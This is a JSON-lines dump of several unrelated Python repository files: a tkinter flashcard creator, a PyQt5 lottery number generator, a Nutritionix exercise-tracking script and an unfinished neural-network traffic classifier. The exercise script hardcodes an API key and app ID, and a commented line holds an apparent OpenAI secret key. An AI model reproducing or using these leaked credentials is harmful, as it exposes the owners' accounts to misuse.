tk.END)\r\n cnqTxtA.delete(1.0, tk.END)\r\n cnqTxtQ.insert(1.0, qList[cardInfo[1]][0])\r\n cnqTxtA.insert(1.0, qList[cardInfo[1]][1])\r\n else:\r\n cnqTxtQ.delete(1.0, tk.END)\r\n cnqTxtA.delete(1.0, tk.END)\r\n elif hbBtn == 4:\r\n finishCont = tk.messagebox.askokcancel(\"Are you finished?\", \"Do you want to finish?\")\r\n if finishCont == True:\r\n iterNumber = 1\r\n txtFileName = \"\".join(scTitle.split()).lower()\r\n global txtFilePath\r\n txtFilePath = os.path.join(scFileDir, txtFileName + \".txt\")\r\n writeFile = open(txtFilePath, \"w\")\r\n infoLnJoin = [str(cardInfo[2]), scTitle]\r\n infoLn = \";\".join(infoLnJoin) + \"\\n\"\r\n writeFile.write(infoLn)\r\n for lines in qList:\r\n lines.insert(0,str(iterNumber))\r\n writeFile.write(\";\".join(lines)+\"\\n\")\r\n iterNumber += 1\r\n createFrm.pack_forget()\r\n scsFrm = tk.Frame(root, bg = \"white\")\r\n scsFrm.pack(expand = True)\r\n scsLab = tk.Label(scsFrm, text = \"Flashcards created successfully\", font = (\"Courier New\", \"20\"), wraplength = 400, bg = \"white\")\r\n scsLab.pack()\r\n scsBtn = tk.Button(scsFrm, text = \"Use flashcards\", command = nfRunFlash, bg = \"white\",relief = \"solid\", font = (\"Courier New\", \"10\"))\r\n scsBtn.pack(pady = 10)\r\n else:\r\n False\r\n else:\r\n tk.messagebox.showerror(\"Internal error\", \"An internal error occured\")\r\n #Check button enable/disable\r\n if cardInfo[2] != 1:\r\n createAddPrev.config(state=\"normal\")\r\n else:\r\n createAddPrev.config(state=\"disabled\")\r\n if cardInfo[2] != cardInfo[0]:\r\n createAddNext.config(state=\"normal\")\r\n else:\r\n createAddNext.config(state=\"disabled\")\r\n \r\ndef showCreationFrame():\r\n global qList, cardInfo, createFrm\r\n #List of question in format [[\"question\", \"answer\"],[\"question\", \"answer\"]]\r\n qList = [[]]\r\n #Card number, list index, total cards\r\n #Only change total cards in add and delete\r\n cardInfo = [1,0,1]\r\n #Main question frame\r\n createFrm = tk.Frame(root, bg = \"white\")\r\n createFrm.pack(expand = True)\r\n \r\n createTitleLab = tk.Label(createFrm, text = \"Create new flashcards\", font = (\"Courier New\", \"20\"), bg = \"white\")\r\n createTitleLab.pack(pady = 10, anchor = \"w\")\r\n\r\n #Create question entry area\r\n cnqFrm = tk.Frame(createFrm, bg = \"white\")\r\n cnqFrm.pack()\r\n\r\n #Question entry\r\n cnqLabQ = tk.Label(cnqFrm, text = \"Question\", bg = \"white\", font = (\"Courier New\", \"12\"))\r\n cnqLabQ.grid(column = 0, row = 0)\r\n #Frame for question Text\r\n cnqTxtQFrm = tk.Frame(cnqFrm, height = 70, width = 150, bg = \"white\")\r\n cnqTxtQFrm.grid(column = 0, row = 1, padx = 10)\r\n cnqTxtQFrm.pack_propagate(False)\r\n #Question Text\r\n global cnqTxtQ\r\n cnqTxtQ = tk.Text(cnqTxtQFrm, relief = \"solid\", wrap=tk.WORD)\r\n cnqTxtQ.pack()\r\n\r\n #Answer entry\r\n cnqLabA = tk.Label(cnqFrm, text = \"Answer\", bg = \"white\", font = (\"Courier New\", \"12\"))\r\n cnqLabA.grid(column = 1, row = 0)\r\n #Frame for answer text\r\n cnqTxtAFrm = tk.Frame(cnqFrm, height = 70, width = 150, bg = \"white\")\r\n cnqTxtAFrm.grid(column = 1, row = 1, padx = 20)\r\n cnqTxtAFrm.pack_propagate(False)\r\n #Answer Text\r\n global cnqTxtA\r\n cnqTxtA = tk.Text(cnqTxtAFrm, relief = \"solid\", wrap=tk.WORD)\r\n cnqTxtA.pack()\r\n\r\n #Controls\r\n createQFrm = tk.Frame(createFrm, bg = \"white\")\r\n createQFrm.pack(pady = 10)\r\n createCreateBtn = tk.Button(createQFrm, text = \"+\", bg = \"white\", relief = \"solid\", command = lambda: handleButton(0), font = (\"Courier New\", \"10\"))\r\n createCreateBtn.grid(column = 0, row = 0, padx = 10)\r\n global createAddPrev\r\n createAddPrev = tk.Button(createQFrm, text = \"<\", bg = \"white\", relief = \"solid\", command = lambda: handleButton(1), state = \"disabled\", font = (\"Courier New\", \"10\"))\r\n createAddPrev.grid(column = 1, row = 0)\r\n global createAddNum\r\n createAddNum = tk.Label(createQFrm, text = \"1/1\", bg = \"white\", font = (\"Courier New\", \"10\"))\r\n createAddNum.grid(column = 2, row = 0)\r\n global createAddNext\r\n createAddNext = tk.Button(createQFrm, text = \">\", bg = \"white\", relief = \"solid\", command = lambda: handleButton(2), state = \"disabled\", font = (\"Courier New\", \"10\"))\r\n createAddNext.grid(column = 3, row = 0)\r\n createAddBtn = tk.Button(createQFrm, text = \"Delete\", bg = \"white\", relief = \"solid\", command = lambda: handleButton(3), font = (\"Courier New\", \"10\"))\r\n createAddBtn.grid(column = 4, row = 0, pady = 10, padx = 20)\r\n createFinishBtn = tk.Button(createQFrm, text = \"Finish\", bg = \"white\", relief = \"solid\", command = lambda: handleButton(4), font = (\"Courier New\", \"10\"))\r\n createFinishBtn.grid(column = 5, row = 0)\r\n \r\n \r\ndef startCreation():\r\n global scTitle, scFileDir\r\n if len(fcTitleEnt.get()) != 0 and len(fcPathEnt.get()) and os.path.exists(fcPathEnt.get()):\r\n scTitle = fcTitleEnt.get()\r\n scFileDir = fcPathEnt.get()\r\n fcInfoFrm.pack_forget()\r\n showCreationFrame()\r\n else:\r\n tk.messagebox.showerror(\"Error\", \"Fill in all fields\")\r\n\r\ndef createGUI():\r\n global fcInfoFrm, fcTitleEnt, fcPathEnt, root\r\n root = tk.Tk()\r\n root.title(\"Flashcard creator\")\r\n root.geometry(\"500x250\")\r\n root.config(bg = \"white\")\r\n root.lift()\r\n \r\n fcInfoFrm = tk.Frame(root, bg = \"white\")\r\n fcInfoFrm.pack(expand = True)\r\n\r\n fcCreateLab = tk.Label(fcInfoFrm, text = \"Create new flashcards\", font = (\"Courier New\", \"20\"), bg = \"white\")\r\n fcCreateLab.pack(pady = 10, anchor = \"w\")\r\n\r\n fcTitleLab = tk.Label(fcInfoFrm, text=\"Title\", bg = \"white\", font = (\"Courier New\", \"10\"))\r\n fcTitleLab.pack(anchor = \"w\")\r\n fcTitleEnt = tk.Entry(fcInfoFrm, width = 40, relief = \"solid\", font = (\"Courier New\", \"10\"))\r\n fcTitleEnt.pack(pady = (0,10), anchor = \"w\")\r\n\r\n fcPathFrm = tk.Frame(fcInfoFrm, bg = \"white\")\r\n fcPathFrm.pack(anchor = \"w\")\r\n fcPathLab = tk.Label(fcPathFrm, text=\"Save location\", bg = \"white\", highlightthickness=0, font = (\"Courier New\", \"10\"))\r\n fcPathLab.grid(row = 0, column = 0, sticky = \"w\")\r\n fcPathEnt = tk.Entry(fcPathFrm, width = 40, relief = \"solid\", font = (\"Courier New\", \"10\"))\r\n fcPathEnt.grid(row = 1, column = 0, pady = (0, 10))\r\n fcPathBtn = tk.Button(fcPathFrm, text = \"Browse...\", command = browseForPath, relief = \"solid\", bg = \"white\", font = (\"Courier New\", \"8\"))\r\n fcPathBtn.grid(row = 1, column = 1, pady = (0,10), padx = (10,0))\r\n\r\n fcNextBtn = tk.Button(fcInfoFrm, text = \"Next >\", command = startCreation, font = (\"Courier New\", \"8\"), relief = \"solid\", bg = \"white\")\r\n fcNextBtn.pack(pady = 10, anchor = \"w\")\r\n root.mainloop()\r\n\r\ndef newFlashCards():\r\n createGUI()\r\n","repo_name":"henry50/flashcards","sub_path":"newFlash.py","file_name":"newFlash.py","file_ext":"py","file_size_in_byte":8963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71744787893","text":"'''\r\nCreated on 3 de jul de 2019\r\n\r\n@author: ANDY\r\n'''\r\n\r\nfrom PyQt5.QtCore import QUrl\r\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, qApp, QStatusBar,\\\r\n QFileDialog\r\n\r\nfrom loterias import *\r\nfrom loteriasWeb import *\r\nfrom gerarNumeros import gerarMega\r\nfrom gerarNumeros import gerarLoto\r\n\r\nimport loteriasLog\r\nimport loteriasDesenvolvedor\r\nimport PyQt5\r\n\r\nclass MyForm(QMainWindow):\r\n '''\r\n classdocs\r\n '''\r\n def __init__(self):\r\n '''\r\n Constructor\r\n '''\r\n super().__init__()\r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self) \r\n \r\n #self.statusbar = QStatusBar()\r\n self.ui.actionSair.triggered.connect(qApp.quit)\r\n \r\n \"\"\" Definindo e configurando os elementos da barra de menu \"\"\"\r\n \r\n ''' aba File '''\r\n # Definindo evento Abrir\r\n self.ui.actionAbrir.triggered.connect(self.actAbrir)\r\n \r\n # Definindo evento Salvar\r\n self.ui.actionSalvar.triggered.connect(self.actSalvar)\r\n \r\n ''' aba Opção '''\r\n # Definindo evento Jogar\r\n self.ui.actionJogar.triggered.connect(self.jogar)\r\n \r\n # Definindo evento Web\r\n self.ui.actionWeb.triggered.connect(self.web)\r\n \r\n # Definindo evento Apagar jogos\r\n self.ui.actionApagar_Jogos.triggered.connect(self.apagar)\r\n \r\n ''' aba About '''\r\n # Definindo evento sobre o dev\r\n self.ui.actionSobre_o_desenvolvedor.triggered.connect(self.sobredev)\r\n \r\n # Definindo evento Log\r\n self.ui.actionLog_de_Atualiza_es.triggered.connect(self.log)\r\n \r\n \"\"\" Definindo e configurando os pushs buttons da Mega Sena \"\"\"\r\n \r\n # Definindo push button jogar Mega sena\r\n self.ui.ButtonJogarMega.clicked.connect(self.jogar)\r\n \r\n # Definindo push button apagar jogos Mega sena\r\n self.ui.ButtonApagarMega.clicked.connect(self.apagar)\r\n \r\n # Definindo push button web Mega sena\r\n self.ui.ButtonWebMega.clicked.connect(self.web)\r\n \r\n \"\"\" Definindo e configurando os pushs buttons da LotoFacil \"\"\"\r\n \r\n # Definindo push button jogar Lotofácil\r\n self.ui.ButtonJogarLoto.clicked.connect(self.jogar)\r\n \r\n # Definindo push button apagar jogos Lotofácil\r\n self.ui.ButtonApagarLoto.clicked.connect(self.apagar)\r\n \r\n # Definindo push button web Lotofácil\r\n self.ui.ButtonWebLoto.clicked.connect(self.web)\r\n \r\n ###self.ui.tabWidget.currentTabName()\r\n \r\n # Definindo e imprimindo a data que consta no sistema\r\n date = QtCore.QDate.currentDate().toString('ddd dd-MM-yyyy') \r\n self.ui.labelDate.setText(date)\r\n \r\n # setting the timer\r\n timer = QtCore.QTimer(self)\r\n timer.timeout.connect(self.showlcd)\r\n timer.start(1000)\r\n self.showlcd()\r\n \r\n self.show()\r\n \r\n def showlcd(self):\r\n #esta função é chamada para mostrar o relógio\r\n \r\n time = QtCore.QTime.currentTime()\r\n text = time.toString('hh:mm:ss')\r\n self.ui.lcdNumber.display(text)\r\n \r\n def actAbrir(self):\r\n \"\"\" Esta função permite abrir um arquivo \"\"\"\r\n \r\n # a variavel self.ui.tabWidget.currentIndex() identifica a tab atual\r\n # onde 0 é mega , 1 lotofacil e assim por diante\r\n \r\n if self.ui.tabWidget.currentIndex() == 0:\r\n \r\n fname = QFileDialog.getOpenFileName(self, 'Abrir arquivo', '', 'Text Files (*.mega)')\r\n if fname[0]:\r\n \r\n with open(fname[0], 'r') as f:\r\n data = f.read()\r\n self.ui.textEditMega.setText(data)\r\n self.statusBar().showMessage(\"Arquivo aberto com sucesso!\", 5000)\r\n \r\n else:\r\n self.statusBar().showMessage(\"Nenhum arquivo aberto!\", 5000)\r\n \r\n elif self.ui.tabWidget.currentIndex() == 1:\r\n \r\n fname = QFileDialog.getOpenFileName(self, 'Abrir arquivo', '', 'Text Files (*.loto)')\r\n if fname[0]:\r\n \r\n with open(fname[0], 'r') as f:\r\n data = f.read()\r\n self.ui.textEditLoto.setText(data)\r\n self.statusBar().showMessage(\"Arquivo aberto com sucesso!\", 5000)\r\n \r\n else:\r\n self.statusBar().showMessage(\"Nenhum arquivo aberto!\", 5000)\r\n \r\n def actSalvar(self):\r\n \r\n if self.ui.tabWidget.currentIndex() == 0:\r\n \r\n if self.ui.textEditMega.toPlainText() == '': \r\n self.statusBar().showMessage(\"Nenhum jogo Mega sena a ser salvo!\", 5000)\r\n \r\n else: \r\n fileName, _ = QFileDialog.getSaveFileName(self,\"Save File\", \"\", \"Text File (*.mega)\") \r\n \r\n if fileName :\r\n with open(fileName, 'w') as f:\r\n data = self.ui.textEditMega.toPlainText()\r\n f.write(data)\r\n self.statusBar().showMessage(\"Jogo salvo com sucesso!\", 5000)\r\n else:\r\n self.statusBar().showMessage(\"Operação Salvar arquivo cancelada!\", 5000)\r\n \r\n elif self.ui.tabWidget.currentIndex() == 1:\r\n \r\n if self.ui.textEditLoto.toPlainText() == '': \r\n self.statusBar().showMessage(\"Nenhum jogo LotoFácil a ser salvo!\", 5000)\r\n \r\n else: \r\n fileName, _ = QFileDialog.getSaveFileName(self,\"Save File\", \"\", \"Text File (*.loto)\") \r\n \r\n if fileName :\r\n with open(fileName, 'w') as f:\r\n data = self.ui.textEditLoto.toPlainText()\r\n f.write(data)\r\n self.statusBar().showMessage(\"Jogo salvo com sucesso!\", 5000)\r\n else:\r\n self.statusBar().showMessage(\"Operação Salvar arquivo cancelada!\", 5000)\r\n \r\n def sobredev(self):\r\n self.dev = QtWidgets.QDialog()\r\n self.uiDev = loteriasDesenvolvedor.Ui_Dialog()\r\n self.uiDev.setupUi(self.dev)\r\n self.dev.show()\r\n \r\n def log(self):\r\n self.winLog = QtWidgets.QDialog()\r\n self.uiLog = loteriasLog.Ui_Dialog()\r\n self.uiLog.setupUi(self.winLog)\r\n \r\n #print(gerarMega())\r\n self.winLog.show()\r\n \r\n def jogar(self):\r\n \r\n if self.ui.tabWidget.currentIndex() == 0:\r\n \r\n aux = 0 \r\n somaMega = self.ui.spinBoxJogosMega.value() * 3.5\r\n if self.ui.spinBoxDezenasMega.value() == 7:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 24.50\r\n if self.ui.spinBoxDezenasMega.value() == 8:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 98\r\n if self.ui.spinBoxDezenasMega.value() == 9:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 294\r\n if self.ui.spinBoxDezenasMega.value() == 10:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 735\r\n if self.ui.spinBoxDezenasMega.value() == 11:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 1617\r\n if self.ui.spinBoxDezenasMega.value() == 12:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 3234\r\n if self.ui.spinBoxDezenasMega.value() == 13:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 6006\r\n if self.ui.spinBoxDezenasMega.value() == 14:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 10510.50\r\n if self.ui.spinBoxDezenasMega.value() == 15:\r\n somaMega = self.ui.spinBoxJogosMega.value() * 17517.50\r\n \r\n \r\n \r\n dezenasMega = self.ui.spinBoxDezenasMega.value()\r\n jogosMega = self.ui.spinBoxJogosMega.value()\r\n restrictMega = [self.ui.ListaMega1, self.ui.ListaMega2, self.ui.ListaMega3,\\\r\n self.ui.ListaMega4, self.ui.ListaMega5, self.ui.ListaMega6,\\\r\n self.ui.ListaMega7, self.ui.ListaMega8]\r\n resultadoMega = []\r\n \r\n # inicialização da variavel que vai contar o tempo\r\n tempoMega = QtCore.QTime()\r\n tempoMega.start()\r\n \r\n # gerando numeros aleatorios\r\n while jogosMega > 0:\r\n \r\n while dezenasMega > aux:\r\n \r\n aleat = gerarMega(restrictMega)\r\n \r\n while aleat in resultadoMega:\r\n aleat = gerarMega(restrictMega) \r\n \r\n resultadoMega.append(aleat)\r\n \r\n aux += 1\r\n \r\n # ordenando o resultado de forma crescente\r\n resultadoMega.sort()\r\n \r\n self.ui.textEditMega.append(' '.join(str(\"{:02d}\".format(num)) for num in resultadoMega))\r\n \r\n aux = 0\r\n \r\n resultadoMega.clear() \r\n jogosMega-=1\r\n tempoMega = tempoMega.elapsed() * 0.001\r\n \r\n self.statusBar().showMessage(\"jogo efetuado em : %0.3f s\" % tempoMega, 5000)\r\n self.ui.textEditMega.append('\\nValor do(s) Jogo(s): ' +str(somaMega)+' R$\\nFeito ' +self.ui.labelDate.text()+' às '\\\r\n +QtCore.QTime.currentTime().toString('hh:mm:ss')+ '\\n')\r\n \r\n for vMega in restrictMega:\r\n if vMega.isChecked():\r\n vMega.setAutoExclusive(False)\r\n vMega.setChecked(False)\r\n vMega.setAutoExclusive(True) \r\n \r\n elif self.ui.tabWidget.currentIndex() == 1:\r\n \r\n aux1 = 0\r\n \r\n somaLoto = self.ui.spinBoxJogosLoto.value() * 2\r\n if self.ui.spinBoxDezenasLoto.value() == 16:\r\n somaLoto = self.ui.spinBoxJogosLoto.value() * 32\r\n if self.ui.spinBoxDezenasLoto.value() == 17:\r\n somaLoto = self.ui.spinBoxJogosLoto.value() * 272\r\n if self.ui.spinBoxDezenasLoto.value() == 18:\r\n somaLoto = self.ui.spinBoxJogosLoto.value() * 1632\r\n \r\n dezenasLoto = self.ui.spinBoxDezenasLoto.value()\r\n jogosLoto = self.ui.spinBoxJogosLoto.value()\r\n restrictLoto = [self.ui.ListaLoto1, self.ui.ListaLoto2, self.ui.ListaLoto3,\\\r\n self.ui.ListaLoto4, self.ui.ListaMega5]\r\n resultadoLoto = []\r\n \r\n # inicialização da variavel que vai contar o tempo\r\n tempoLoto = QtCore.QTime()\r\n tempoLoto.start()\r\n \r\n # gerando numeros aleatorios\r\n while jogosLoto > 0:\r\n \r\n while dezenasLoto > aux1:\r\n \r\n aleat = gerarLoto(restrictLoto)\r\n \r\n while aleat in resultadoLoto:\r\n aleat = gerarLoto(restrictLoto)\r\n \r\n resultadoLoto.append(aleat)\r\n \r\n aux1 += 1\r\n \r\n # ordenando o resultado de forma crescente\r\n resultadoLoto.sort()\r\n \r\n self.ui.textEditLoto.append(' '.join(str(\"{:02d}\".format(num)) for num in resultadoLoto))\r\n aux1 = 0\r\n resultadoLoto.clear()\r\n \r\n jogosLoto-=1\r\n tempoLoto = tempoLoto.elapsed() * 0.001\r\n \r\n self.statusBar().showMessage(\"jogo efetuado em : %0.3f s\" % tempoLoto, 5000)\r\n self.ui.textEditLoto.append('\\nValor do(s) Jogo(s): ' +str(somaLoto)+' R$\\nFeito ' +self.ui.labelDate.text()+\\\r\n ' às '+QtCore.QTime.currentTime().toString('hh:mm:ss')+ '\\n')\r\n \r\n for vLoto in restrictLoto:\r\n if vLoto.isChecked():\r\n vLoto.setAutoExclusive(False)\r\n vLoto.setChecked(False)\r\n vLoto.setAutoExclusive(True)\r\n \r\n def apagar(self):\r\n \"\"\" Esta função o jogo efetuado\"\"\"\r\n \r\n if self.ui.tabWidget.currentIndex() == 0:\r\n \r\n if self.ui.textEditMega.toPlainText() == \"\":\r\n self.statusBar().showMessage(\"Nenhum jogo da Mega Sena ser apagado!\", 5000)\r\n else:\r\n self.ui.textEditMega.clear()\r\n self.statusBar().showMessage(\"Últimos jogos da Mega Sena apagados!\", 5000)\r\n \r\n elif self.ui.tabWidget.currentIndex() == 1:\r\n \r\n if self.ui.textEditLoto.toPlainText() == \"\":\r\n self.statusBar().showMessage(\"Nenhum jogo da LotoFácil ser apagado!\", 5000)\r\n else:\r\n self.ui.textEditLoto.clear()\r\n self.statusBar().showMessage(\"Últimos jogos da LotoFácil apagados!\", 5000)\r\n \r\n def web(self):\r\n \"\"\" Esta função abre uma nova janela com um navegador dentro\r\n lembrando que é necessário instanciar sempre todas as janela\r\n não importa se for do tipo Dialog, Widget ou MainWindow \"\"\"\r\n \r\n if self.ui.tabWidget.currentIndex() == 0:\r\n self.webMega = QtWidgets.QWidget()\r\n self.uiWebMega = Ui_Form()\r\n self.uiWebMega.setupUi(self.webMega)\r\n \r\n self.webMega.setWindowTitle(\"Resultado MEGA SENA\")\r\n \r\n # Configurando os butões do navegador\r\n self.uiWebMega.pushButtonBack.clicked.connect(self.uiWebMega.widget.back)\r\n self.uiWebMega.pushButtonReload.clicked.connect(self.uiWebMega.widget.reload)\r\n self.uiWebMega.pushButtonForward.clicked.connect(self.uiWebMega.widget.forward) \r\n \r\n # Configurando o link\r\n self.uiWebMega.widget.load(QUrl('http://www.loterias.caixa.gov.br/wps/portal/loterias/landing/megasena/'))\r\n self.statusBar().showMessage(\"Consulta Web Mega Sena processada com sucesso!\", 5000)\r\n \r\n self.webMega.show() \r\n \r\n elif self.ui.tabWidget.currentIndex() == 1:\r\n self.webLoto = QtWidgets.QWidget()\r\n self.uiWebLoto = Ui_Form()\r\n self.uiWebLoto.setupUi(self.webLoto)\r\n \r\n self.webLoto.setWindowTitle(\"Resultado LOTOFACIL\")\r\n \r\n # Configurando os butões do navegador\r\n self.uiWebLoto.pushButtonBack.clicked.connect(self.uiWebLoto.widget.back)\r\n self.uiWebLoto.pushButtonReload.clicked.connect(self.uiWebLoto.widget.reload)\r\n self.uiWebLoto.pushButtonForward.clicked.connect(self.uiWebLoto.widget.forward) \r\n \r\n # Configurando o link\r\n self.uiWebLoto.widget.load(QUrl('http://www.loterias.caixa.gov.br/wps/portal/loterias/landing/lotofacil/'))\r\n self.statusBar().showMessage(\"Consulta Web LotoFácil processada com sucesso!\", 5000)\r\n \r\n self.webLoto.show()\r\n \r\n \r\n ","repo_name":"detona115/Loterias","sub_path":"MyFormM.py","file_name":"MyFormM.py","file_ext":"py","file_size_in_byte":15669,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42005899836","text":"#---------------------------- EXERCISE TRACKING -----------------------#\nimport requests\n\nAPP_ID = \"ffc8ca90\"\nAPI_KEY = \"a09dafa569ae5130cac1f1e635301493\"\n\nheaders = {\n \"x-app-id\": APP_ID,\n \"x-app-key\": API_KEY\n }\n\nuser_input = input(\"Which exercise you did ?\")\n\nbody = {\n \"query\": user_input,\n \"gender\": \"female\",\n \"weight_kg\": 72.5,\n \"height_cm\": 167.64,\n \"age\": 30\n} \n\n\nend_point = f\"https://trackapi.nutritionix.com/v2/natural/exercise\"\n\nresponse = requests.post(end_point, headers=headers, json=body)\nresponse.raise_for_status()\ndata = response.json()\nprint(data)\n\n\n\n\n\n\n\n# open_api_key = \"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\"\n\n","repo_name":"MaRajpt/Abdullahs_Blogs","sub_path":"Angela_Udemy/Day38/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17141395931","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@ use ANN to classify\n\nref: https://raw.githubusercontent.com/MorvanZhou/PyTorch-Tutorial/master/tutorial-contents/401_CNN.py\n\nDependencies:\n torch: 0.4\n torchvision\n matplotlib\n\n\"\"\"\nfrom collections import Counter\n\nimport numpy as np\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\nfrom sklearn.preprocessing import OneHotEncoder\nfrom torch import optim\nfrom torch.autograd import Variable\n\nfrom utilities.preprocess import achieve_train_test_data, normalize_data, change_label, \\\n load_data_compute_mean\n\n__author__ = 'Learn_live'\n\n# library\n# standard library\n\n# third-party library\nimport torch\nimport torch.nn as nn\nimport torch.utils.data as Data\nimport matplotlib.pyplot as plt\n\nfrom sklearn.neural_network import MLPClassifier\n\n\nclass MLP():\n\n def __init__(self, *args, **kwargs):\n aplpha = 1\n self.epochs = kwargs['epochs']\n self.batch_size = kwargs['BATCH_SIZE']\n self.first_n_pkts = kwargs['first_n_pkts']\n self.out_size = kwargs['num_class']\n\n first_n_pkts = 10\n self.small_in_size = first_n_pkts\n self.small_h_size = 5\n self.small_out_size = 2\n self.clf = MLPClassifier(solver='sgd', alpha=1e-5, hidden_layer_sizes=(128, 64, 32, 16, 8), random_state=1,\n activation='tanh')\n\n def train(self, training_set):\n X = training_set[0]\n y = training_set[1]\n # pkts_x = X[:, 0:self.first_n_pkts]\n # flow_dur = X[:, self.first_n_pkts]\n # intr_x = X[:, self.first_n_pkts + 1:2 * self.first_n_pkts + 1]\n #\n # pkts_outputs = self.pkts_ann(pkts_x)\n # # flow_dur = flow_dur\n # intr_outputs = self.intr_tm_ann(intr_x)\n #\n # new_X = []\n # for i in range(len(X)):\n # lst_tmp = []\n # lst_tmp.append(flow_dur[i].input_data.tolist())\n # lst_tmp.extend(pkts_outputs[i].input_data.tolist())\n # lst_tmp.extend(intr_outputs[i].input_data.tolist())\n # new_X.append(lst_tmp)\n # # X = [pkts_outputs, flow_dur, intr_outputs]\n # new_X = torch.Tensor(new_X)\n # y_preds = self.classify_ann(new_X)\n # # _, y_preds=y_preds.input_data.max(dim=1) # get max value of each row\n #\n # return y_preds\n #\n self.clf.fit(X, y)\n\n def predict(self, X):\n # self.clf.predict([[2., 2.], [-1., -2.]])\n\n return self.clf.predict(X)\n\n def evaluate(self, Y, Y_preds):\n # cnt = 0\n # for i in range(len(Y)):\n # if Y[i] == Y_preds[i]:\n # cnt += 1\n # accuracy = cnt / len(Y)\n\n print(classification_report(Y, Y_preds))\n print(confusion_matrix(Y, Y_preds))\n\n return accuracy_score(Y, Y_preds)\n\n\ndef print_network(describe_str, net):\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(describe_str, net)\n print('Total number of parameters: %d' % num_params)\n\n\nclass ANN(nn.Module):\n\n def __init__(self, *args, **kwargs):\n # super(ANN,self).__init__() # python 2.x\n super().__init__() # python 3.x\n\n self.epochs = kwargs['epochs']\n self.batch_size = kwargs['BATCH_SIZE']\n self.first_n_pkts = kwargs['first_n_pkts']\n self.out_size = kwargs['num_class']\n\n first_n_pkts = 10\n self.small_in_size = first_n_pkts\n self.small_h_size = 5\n self.small_out_size = 2\n\n self.pkts_ann = nn.Sequential(nn.Linear(self.small_in_size, self.small_h_size * 2), nn.Tanh(),\n nn.Linear(self.small_h_size * 2, self.small_h_size), nn.Tanh(),\n nn.Linear(self.small_h_size, self.small_out_size)\n )\n\n self.intr_tm_ann = nn.Sequential(nn.Linear(self.small_in_size, self.small_h_size * 2), nn.Tanh(),\n nn.Linear(self.small_h_size * 2, self.small_h_size), nn.Tanh(),\n nn.Linear(self.small_h_size, self.small_out_size)\n )\n\n self.in_size = 2 * self.small_out_size + 1 # first_n_pkts_list, flow_duration, intr_time_list\n self.h_size = 5\n # self.out_size = 1 # number of label, one-hot coding\n self.classify_ann = nn.Sequential(nn.Linear(self.in_size, self.h_size * 2), nn.Tanh(),\n nn.Linear(self.h_size * 2, self.h_size), nn.Tanh(),\n nn.Linear(self.h_size, self.out_size, nn.Softmax())\n )\n\n print('---------- Networks architecture -------------')\n print_network('pkts_ann:', self.pkts_ann)\n print_network('intr_tm_ann:', self.intr_tm_ann)\n print_network('classify_ann:', self.classify_ann)\n print('-----------------------------------------------')\n\n # self.criterion = nn.MSELoss(size_average=False)\n self.criterion = nn.MultiLabelMarginLoss()\n self.d_learning_rate = 1e-4\n self.g_learning_rate = 1e-4\n # self.optimizer = torch.optim.Adam(self.proposed_algorithms.parameters(), lr=self.learning_rate)\n # self.optimizer = optim.Adam([self.pkts_ann, self.intr_tm_ann, self.classify_ann], lr=self.d_learning_rate,\n # betas=(0.5, 0.9))\n params = list(self.pkts_ann.parameters()) + list(self.intr_tm_ann.parameters()) + list(\n self.classify_ann.parameters())\n self.optimizer = optim.Adam(params, lr=self.g_learning_rate, betas=(0.5, 0.9))\n\n def forward(self, X):\n pass\n\n def train(self, training_set):\n self.train_hist = {}\n self.train_hist['loss'] = []\n\n # dataset = Data.TensorDataset(torch.Tensor(training_set[0]), torch.Tensor(training_set[1])) # X, Y\n ### re divide dataset\n train_loader = Data.DataLoader(\n dataset=training_set, # torch TensorDataset format\n batch_size=self.batch_size, # mini batch size\n shuffle=True,\n num_workers=2,\n )\n for epoch in range(self.epochs):\n for step, (b_x, b_y) in enumerate(\n train_loader): # type: (int, (object, object)) # gives batch data, normalize x when iterate train_loader\n # print('step:',step, ', batchs:',int(len(dataset)/self.batch_size))\n b_x = Variable(b_x, requires_grad=True)\n # b_y = Variable(b_y.view(-1, 1))\n b_y = Variable(b_y.long())\n y_preds = self.forward(b_x)\n loss = self.criterion(y_preds, b_y) # net_outs, y_real(targets)\n\n self.optimizer.zero_grad() # clear gradients for this training step\n loss.backward() # backpropagation, compute gradients\n self.optimizer.step() # apply gradients\n\n self.train_hist['loss'].append(loss.data.tolist())\n if step % 100 == 0:\n print('epoch = %d, loss = %f' % (epoch, loss.data.tolist()))\n\n def predict(self, X):\n y_preds = self.forward(X)\n _, y_ = y_preds.data.max(dim=1, keepdim=False) # return max_value as predicted value\n\n # y_preds=y_preds.input_data.tolist()\n # y_=[]\n # for i in range(len(y_preds)):\n # if y_preds[i][0] > 0.5:\n # y_.append(1)\n # else:\n # y_.append(0)\n\n return y_.data.tolist()\n\n def evaluate(self, Y, Y_preds):\n cnt = 0\n for i in range(len(Y)):\n if Y[i] == Y_preds[i]:\n cnt += 1\n accuracy = cnt / len(Y)\n\n return accuracy\n\n\ndef show_figure(loss):\n data = list(loss)\n plt.plot(range(len(data)), data)\n plt.show()\n\n\ndef one_hot_sklearn(label_integer):\n label_integer = np.asarray(label_integer, dtype=int)\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = label_integer.reshape(len(label_integer), 1)\n onehot_encoded = onehot_encoder.fit_transform(integer_encoded)\n\n return np.array(onehot_encoded, dtype=int)\n\n\nif __name__ == '__main__':\n torch.manual_seed(1) # reproducible\n\n input_file = '../results/AUDIO_first_n_pkts_10_all_in_one_file.txt'\n # X, Y = load_data(input_file)\n X, Y = load_data_compute_mean(input_file)\n X = normalize_data(np.asarray(X, dtype=float), range_value=[0, 1], eps=1e-5)\n Y = change_label(Y)\n 